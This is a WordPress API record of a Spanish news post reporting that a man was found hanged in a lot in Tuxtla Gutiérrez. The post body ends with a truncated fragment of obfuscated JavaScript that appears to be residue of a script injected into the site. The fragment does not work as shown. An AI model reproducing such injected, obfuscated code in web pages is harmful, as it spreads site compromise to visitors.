{"id":15258,"date":"2024-04-23T00:55:07","date_gmt":"2024-04-23T00:55:07","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15258"},"modified":"2024-04-23T00:55:08","modified_gmt":"2024-04-23T00:55:08","slug":"encuentran-a-un-hombre-colgado-en-un-predio-de-la-zona-poniente-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15258","title":{"rendered":"Encuentran a un hombre colgado en un predio de la zona Poniente de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"15259\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713833514204-1024x768.jpg\" alt=\"\" class=\"wp-image-15259\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713833514204-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713833514204-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713833514204-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713833514204.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"15260\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713833518276-1024x768.jpg\" alt=\"\" class=\"wp-image-15260\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713833518276-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713833518276-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713833518276-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713833518276.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 22 de abril del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este lunes se report\u00f3 el hallazgo de un sujeto colg@do de un \u00e1rbol sujeto del cuello con un lazo, en un predio ubicado en en la zona Poniente de Sur de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de la polic\u00eda Estatal Preventiva, quienes tomaron nota de lo sucedido.<\/p>\n\n\n\n<p>En el lugar se inform\u00f3 que, los residentes de la zona ubicada a un costado de la Colonia Flor de Mactumatz\u00e1, buscaban le\u00f1a cuando hicieron el macabro hallazgo a unos 30 metros de la carretera.<\/p>\n\n\n\n<p>Los lugare\u00f1os identificaron al hoy occiso, como Emanuel de 31 a\u00f1os de edad, quien padec\u00eda alcoholismo y demabulaba en esta zona.<\/p>\n\n\n\n<p>Al lugar arribaron peritos de la Fiscal\u00eda General del Estado para realizar las diligencias correspondientes, levantar el cuerpo y trasladarlo al Semefo donde se practicar\u00eda la necropsia de ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 22 de abril del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este lunes se report\u00f3 el hallazgo de un sujeto colg@do de un \u00e1rbol sujeto del cuello con un lazo, en un predio ubicado en en la zona Poniente de Sur de Tuxtla Guti\u00e9rrez. Al lugar arribaron elementos de la polic\u00eda Estatal Preventiva, quienes &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15260,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-15258","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15258","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15258"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15258\/revisions"}],"predecessor-version":[{"id":15261,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15258\/revisions\/15261"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15260"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15258"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15258"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15258"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}